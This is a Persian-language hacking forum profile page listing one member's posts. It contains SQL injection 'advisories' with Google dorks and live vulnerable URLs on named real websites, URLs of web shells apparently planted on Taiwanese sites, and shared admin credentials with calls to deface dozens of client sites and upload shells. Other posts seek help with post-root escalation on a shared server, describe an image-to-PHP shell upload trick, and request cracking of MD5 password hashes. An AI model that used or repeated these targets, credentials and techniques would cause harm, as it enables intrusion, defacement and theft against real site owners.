shahroukh

کاربر تازه وارد
  • تعداد ارسال ها

    16
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    7

تمامی مطالب نوشته شده توسط shahroukh

  1. ############################################ # Title : Teaminertia CMS Sql Injection Vulnerability # Author : Guardiran Security Team # category : webapps # Tested On : Win 10 , Kali Linux # Vendor HomePage : https://www.teaminertia.com # Google Dork: dork : intext:"Design by Team Inertia Technologies" & inurl:/.php?id= # Admin Page : target/admin # Data : 05/16/2019 ############################################ #PROF : http://www.goaholidayvillas.com/listing.php?id=1' http://www.fiae.in/about-detail.php?id=16'[Sql injection Vulnerability] http://www.propertysurat.com/testimonial_disp.php?id=1'[Sql injection Vulnerability] http://www.fairwayshipping.co.in/certification.php?id=4 '[Sql injection Vulnerability] http://www.gucb.co.in/content2.php?itemid=6 '[Sql injection Vulnerability] http://www.goaholidayvillas.com/listing.php?id=1 '[Sql injection Vulnerability] #Discovered by : sir shahroukh ############################################ https://cxsecurity.com/issue/WLB-2019050173
  2. shahroukh

    http://www.dacheng1971.com.tw/lyadmin/pages/uploads/image/pro_nlsjvu1i58.php http://www.gcomtw.com/lyadmin/pages/uploads/image/New_n2no66hgwe.php http://refined.com.tw/lyadmin/uploads/image/img1_epdo91agin.php http://www.nirey.com.tw/uploads/image/pic_hr0ssbj4fv.php
  3. shahroukh

    بیشتر از 150 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : 8426228jerry vendor : https://www.injerry.com/portfolio-web.php?PID=1 vendor : https://www.injerry.com/portfolio-web.php?PID=2 admin page : target/admin/login.php بعضی از تارگت ها : http://shonshenc.com http://www.chapond.com http://www.knowfate.com.tw http://www.hsdiffuser.com
  4. ############################################ # Title : WebCzech CMS Sql Injection Vulnerability # Author : Guardiran Security Team # category : webapps # Tested On : Win 10 , Kali Linux # Vendor HomePage : https://www.webczech.cz # Google Dork : intext:"e-shop system WebCzech " inurl:/.php?id= ############################################ # PROF: http://www.general-store.cz/static.php?id=5' [Sql injection Vulnerability] http://www.kozena-penezenka.cz/static.php?id=13'[Sql injection Vulnerability] http://eshop.pozarnizbrojnice.cz/static.php?id=1'[Sql injection Vulnerability] http://www.restaurace-retro.cz/eshop/static.php?id=1'[Sql injection Vulnerability] # Discovered by : sir shahroukh ############################################ https://cxsecurity.com/issue/WLB-2019010203 ############################################
  5. shahroukh

    پسوردهای هش شده رو اینجا بفرستید تا بررسی کنیم
  6. shahroukh

    بیشتر از 50 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : applezeed9 vendor : http://applezeed.com/portfolio.php http://www.grandtourismo.co.th/backend http://www.nicetrip.co.th/backend http://www.naratelbangkok.com/backend http://www.lookrig.com/backend http://www.overallsystemtrade.com/backend/ http://www.oldiesmusicthailand.com/backend/ http://www.melogistic.com/backend/ http://www.istyletraveler.com/backend/ http://www.sandasiamtour.com/backend/ ------------------------------------------------- موفق باشید
  7. ############################################ Title : Kaadesign CMS Sql Injection Vulnerability# Author : Guardiran Security Team# category : webapps# Tested On : Win 10 , Kali Linux# Vendor : http://www.kaadesign.com# # Google Dork: intext:"تصميم وتطوير شركة الموسوعة العراقية" & inurl:CMS.php?CMS_P=# ############################################ :PROF # http://www.kmciq.com/Arabic/CMS.php?CMS_P=10' [Sql injection Vulnerability] http://www.kmc.edu.iq/Arabic/CMS.php?CMS_P=17'[Sql injection Vulnerability] http://uruk.edu.iq/English/CMS.php?CMS_P=57'[Sql injection Vulnerability] http://www.urukuni.com/CMS.php?CMS_P=48'[Sql injection Vulnerability] Discovered by : injectorcoder# https://cxsecurity.com/issue/WLB-2019010046
  8. shahroukh

    سلام به دوستان قبلا در جایی خونده بودم که بعضی از سایت ها برای بالا بردن رنک سایت خودشون یه سری کد ها رو در سایت های معروف که بازدید و رنک خوبی دارند به صورت مخفیانه قرار میدهند تا باعث بهتر شدن رنک سایتشون بشه میخواستم بدونم دوستان تجربه چنین کاری دارند و در کل نظری دارند در این حوزه سپاس
  9. من همونی هستم که از ثبت احوال اکسس داشتم  و در تلگرام بهت پیام میدادم / ** قضیه کنتل **و از اون سایت که اکسس  داشتم  واست در سکرت عکس فرستادم گفتی دهنت سرویس که از کجاها اکسس داری

    اگه منو شناختی لطفا اسم من رو  نگو  و جواب بده 

    1. 1TED

      1TED

      شناختمت برادر ، لطفا پیام خصوصیتو چک کن ♥

  10. سلام / محمد تو هستی  ؟؟

     

    1. 1TED

      1TED

      درود ../ بله خودم هستم شما !؟

  11. اساتید این حوزه نظر و راهکاری ندارند ؟؟؟؟
  12. سلام از یه تارگت اکسس گرفتم و اشل اپ کردم و تونستم بایپس کنم و تا روت در شل رفتم بیش از 150 سایت در سرور وجود داره اما مجوز برای خواندن اونها را نمیده عکس برای واضح تر بودن موضوع ضمیمه شد به نظرتان باید چه کرد ؟؟
  13. shahroukh

    من هم همین مشکل را دارم / اومدم به شما پیام خصوصی بدم اما خطا داد و ظاهرا پیام برای شما ارسال نمیشه شاید اینباکس شما پرشده هست لطفا خالی کنید تا پیام رو ارسال کنم با تشکر
  14. shahroukh

    بوسیله این کار میتونید عکس رو تبدیل به فایل php کنیدو شل را آپ کنید فایل ضمیمه شد و آموزشش هم داخلش هست موفق باشید exiftool-9.9.zip
  15. shahroukh

    با سلام بسنه به نوع سیستم موردنظر دارد . معمولا در پوشه include هست اگر میخواس برات پیدا کنم پیام خصوصی کن برات پیدا میکنم و هیچ کاری نداره
  16. shahroukh

    با تشکر از دوستان / هش درست هست و مشکلی نداره . خیلی مهم هستند کرک کردن این هش برای بنده . در سطح نت هم در خیلی از سایت ها تست گرفتم اما نتیجه ایی نداشت
  17. shahroukh

    با سلام برای رفتن به سی پنل لینوکس به صورت دستی در مرورگر مینویسیم: TARGET:2082 یا TARGET/CPANEL حالا سوال اینه که میخوام به صورت دستی به ادرس PHPMYADMIN برم اینا رو هم امتحان کردم TARGRT/PHPMYADMIN , TARGET/PHPMYADMIN و به حروف هم بازی کردم اما مسیر این نیست ممنون میشم راهنمایی بفرمایید تا مسیر درست رو متوجه بشم
  18. shahroukh

    با سلام ممنون میشم این 2 پسورد هش شده را برای بنده کرک نمایید cfae496e250bb7f50f6109ffca8b39f6 3a34ad8b000abf6f41e02901434cc867 با تشکر